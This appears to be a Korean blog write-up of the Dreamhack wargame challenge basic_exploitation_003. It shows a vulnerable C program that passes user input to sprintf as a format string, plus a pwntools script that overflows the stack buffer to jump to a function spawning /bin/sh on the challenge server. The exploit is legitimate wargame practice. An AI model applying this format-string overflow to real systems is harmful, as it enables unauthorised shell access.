dreamhack - basic_exploitation

Notice

Recent Posts

Recent Comments

Link

« 2024/10 »
일	월	화	수	목	금	토
		1	2	3	4	5
6	7	8	9	10	11	12
13	14	15	16	17	18	19
20	21	22	23	24	25	26
27	28	29	30	31

Tags more

Archives

Today

Total

관리 메뉴

외로운 Nova의 작업실

dreamhack - basic_exploitation_003 본문

Computer App Penetesting/System Vulnerability

dreamhack - basic_exploitation_003

Nova_ 2023. 4. 28. 13:57

- source code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
void get_shell() {
    system("/bin/sh");
}
int main(int argc, char *argv[]) {
    char *heap_buf = (char *)malloc(0x80);
    char stack_buf[0x90] = {};
    initialize();
    read(0, heap_buf, 0x80);
    sprintf(stack_buf, heap_buf);
    printf("ECHO : %s\n", stack_buf);
    return 0;
}

sprintf(stack_buf, "%128d%1$", "\x12\x34\x56\x78")

- exploit code

from pwn import *

p = remote("23.81.42.210", 11786)

shell = 0x8048669

payload = b"%156c" + p32(shell)

p.send(payload)

p.recvline()
p.interactive()

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

dreamhack - basic_exploitation_002 (0)	2023.04.27
dreamhack - OOB write up (0)	2023.04.25
dreamhack - fho write up (0)	2023.04.24
dreamhack - hook write up (0)	2023.04.22
dreamhack - oneshot write up (0)	2023.04.21

'Computer App Penetesting/System Vulnerability' Related Articles

Comments

외로운 Nova의 작업실

dreamhack - basic_exploitation_003 본문

dreamhack - basic_exploitation_003

'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글

티스토리툴바